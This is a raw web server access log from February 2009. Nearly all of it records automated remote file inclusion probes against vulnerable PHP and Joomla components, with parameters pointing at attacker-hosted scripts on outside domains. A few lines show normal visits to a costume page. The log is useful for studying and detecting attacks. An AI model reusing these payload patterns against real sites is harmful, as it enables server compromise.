216.22.26.95 - - [05/Feb/2009:04:21:29 -0600] "GET /logs/access_log.1214524800%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:30 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:30 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:30 -0600] "GET /logs/access_log.1212278400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:33 -0600] "GET /logs/access_log.1214524800%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:48 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:48 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:48 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:50 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:50 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:50 -0600] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:57 -0600] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:57 -0600] "GET /logs/access_log.1214524800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:04:23:13 -0600] "GET /principal.php?conteudo=http://gumansin.com/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:04:23:13 -0600] "GET /logs/access_log.1218326400/principal.php?conteudo=http://gumansin.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:04:23:13 -0600] "GET /logs/principal.php?conteudo=http://gumansin.com/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:46 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:46 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:46 -0600] "GET /logs/access_log.1218931200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:55 -0600] "GET /logs/access_log.1214092800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:57 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:57 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:23:57 -0600] "GET /logs/access_log.1218931200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:24:06 -0600] "GET /logs/access_log.1214092800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 374 "-""Mozilla/5.0"
74.200.223.213 - - [05/Feb/2009:04:26:39 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
74.200.223.213 - - [05/Feb/2009:04:26:39 -0600] "GET /errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.820"
74.200.223.213 - - [05/Feb/2009:04:26:39 -0600] "GET /logs/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.820"
74.200.223.213 - - [05/Feb/2009:04:28:18 -0600] "GET /logs/access_log.1212192000/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
200.45.224.18 - - [05/Feb/2009:04:28:41 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fname.info/index2.html?? HTTP/1.1" 404 344 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
200.45.224.18 - - [05/Feb/2009:04:28:41 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fname.info/index2.html?? HTTP/1.1" 404 349 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
84.21.71.133 - - [05/Feb/2009:04:29:45 -0600] "GET /logs/access_log.1212278400/sphider/admin/configset.php?settings_dir=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:04:29:45 -0600] "GET /logs/sphider/admin/configset.php?settings_dir=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:04:29:45 -0600] "GET /sphider/admin/configset.php?settings_dir=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
209.172.33.230 - - [05/Feb/2009:04:30:05 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:04:30:10 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:04:30:10 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 367 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:04:30:27 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 367 "-""libwww-perl/5.812"
67.76.163.60 - - [05/Feb/2009:04:31:10 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.76.163.60 - - [05/Feb/2009:04:31:12 -0600] "GET /logs/access_log.1215216000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.76.163.60 - - [05/Feb/2009:04:31:12 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
84.21.71.133 - - [05/Feb/2009:04:31:31 -0600] "GET /logs/access_log.1216944000/sphider/admin/configset.php?settings_dir=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
67.76.163.60 - - [05/Feb/2009:04:33:43 -0600] "GET /logs/access_log.1212278400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
64.182.252.18 - - [05/Feb/2009:04:33:56 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/billings/ins.txt%0D?? HTTP/1.0" 404 359 "-""libwww-perl/5.53"
64.182.252.18 - - [05/Feb/2009:04:33:56 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/billings/ins.txt%0D?? HTTP/1.0" 404 337 "-""libwww-perl/5.53"
64.182.252.18 - - [05/Feb/2009:04:33:56 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/billings/ins.txt%0D?? HTTP/1.0" 404 332 "-""libwww-perl/5.53"
64.182.252.18 - - [05/Feb/2009:04:34:24 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/billings/ins.txt%0D?? HTTP/1.0" 404 359 "-""libwww-perl/5.53"
67.76.163.60 - - [05/Feb/2009:04:34:53 -0600] "GET /logs/access_log.1216944000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
218.106.254.18 - - [05/Feb/2009:04:36:23 -0600] "GET /logs/access_log.1210291200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.18.194.51 - - [05/Feb/2009:04:36:28 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:04:36:28 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
218.106.254.18 - - [05/Feb/2009:04:36:33 -0600] "GET /logs/access_log.1209686400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:04:36:45 -0600] "GET /logs/galeria.php?start=0&kategoria=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:04:36:45 -0600] "GET /logs/access_log.1225756800/galeria.php?start=0&kategoria=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:04:36:46 -0600] "GET /logs/access_log.1225756800/galeria.php?start=0&kategoria=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:04:36:46 -0600] "GET /logs/galeria.php?start=0&kategoria=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.5.163.212 - - [05/Feb/2009:04:38:00 -0600] "GET /logs/access_log.1198454400/SQuery/lib/gore.php?libpath=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:04:38:01 -0600] "GET /SQuery/lib/gore.php?libpath=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:04:38:01 -0600] "GET /logs/SQuery/lib/gore.php?libpath=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
202.44.52.78 - - [05/Feb/2009:04:38:26 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 367 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:04:38:26 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:04:38:28 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:04:38:38 -0600] "GET /logs/access_log.1215216000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 367 "-""libwww-perl/5.65"
200.103.16.43 - - [05/Feb/2009:04:38:52 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:38:55 -0600] "GET /logs/access_log.1217548800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:38:55 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:04:39:42 -0600] "GET /logs/access_log.1212278400%20/sphider/admin/configset.php?settings_dir=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:39:59 -0600] "GET /logs/access_log.1217548800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:39:59 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:39:59 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:04:40:37 -0600] "GET /logs/access_log.1217894400/SQuery/lib/gore.php?libpath=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:42:03 -0600] "GET /logs/access_log.1217548800%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
84.245.209.105 - - [05/Feb/2009:04:42:16 -0600] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:16 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:17 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:19 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:20 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:20 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
84.245.209.105 - - [05/Feb/2009:04:42:21 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; lv; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)"
64.18.194.51 - - [05/Feb/2009:04:42:37 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:04:42:37 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.103.16.43 - - [05/Feb/2009:04:42:44 -0600] "GET /logs/access_log.1217548800%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
203.147.0.48 - - [05/Feb/2009:04:43:34 -0600] "GET /logs/access_log.1215043200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caaaa.altervista.org/sc.txt? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:04:43:37 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caaaa.altervista.org/sc.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.147.0.48 - - [05/Feb/2009:04:43:38 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://caaaa.altervista.org/sc.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:04:45:27 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.76.163.60 - - [05/Feb/2009:04:45:27 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
91.195.124.11 - - [05/Feb/2009:04:45:32 -0600] "GET /logs/access_log.1214438400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:32 -0600] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:32 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:32 -0600] "GET /logs/access_log.1219017600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:34 -0600] "GET /logs/access_log.1219017600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:35 -0600] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:35 -0600] "GET /logs/access_log.1214438400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:04:45:35 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
67.76.163.60 - - [05/Feb/2009:04:45:35 -0600] "GET /logs/access_log.1216512000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
74.200.223.213 - - [05/Feb/2009:04:45:46 -0600] "GET /logs/access_log.1219449600/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
216.22.26.95 - - [05/Feb/2009:04:49:32 -0600] "GET /logs/access_log.1219536000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:49:32 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:49:32 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:49:38 -0600] "GET /logs/access_log.1219536000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:49:38 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:49:38 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
211.115.110.64 - - [05/Feb/2009:04:50:17 -0600] "GET /logs//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:50:17 -0600] "GET /logs/access_log.1216944000//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:50:17 -0600] "GET //include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:50:30 -0600] "GET /logs/access_log.1219536000%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:04:50:36 -0600] "GET /logs/access_log.1219536000%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
200.45.224.18 - - [05/Feb/2009:04:52:12 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keken.web.id/psybnc/test.pl?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.45.224.18 - - [05/Feb/2009:04:52:12 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keken.web.id/psybnc/test.pl?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
67.76.163.60 - - [05/Feb/2009:04:52:13 -0600] "GET /logs/access_log.1213660800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:04:52:19 -0600] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:04:52:19 -0600] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:04:52:19 -0600] "GET /logs/access_log.1215216000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
74.200.223.213 - - [05/Feb/2009:04:52:32 -0600] "GET /logs/access_log.1211155200/errors.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.820"
217.75.209.39 - - [05/Feb/2009:04:53:25 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.75.209.39 - - [05/Feb/2009:04:53:25 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
217.75.209.39 - - [05/Feb/2009:04:53:25 -0600] "GET /logs/access_log.1209686400//skin/zero_vote/ask_password.php?dir=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:53:43 -0600] "GET //include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.115.110.64 - - [05/Feb/2009:04:53:43 -0600] "GET /logs/access_log.1216944000//include/lib.inc.php?site_path=http://sayphoto.net/bbs/include/fxid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
